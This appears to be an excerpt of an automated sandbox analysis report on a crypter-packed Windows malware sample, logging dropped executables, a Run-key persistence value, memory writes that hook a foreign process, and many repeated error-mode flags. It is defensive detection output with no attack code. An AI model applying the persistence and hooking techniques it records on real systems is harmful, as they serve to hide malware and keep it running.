Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6

Hooking and other Techniques for Hiding and Protection

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Memory written: PID: 7992 base: 7FF9082F0008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	Memory written: PID: 7992 base: 7FF90818D9F0 value: E9 20 26 16 00

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
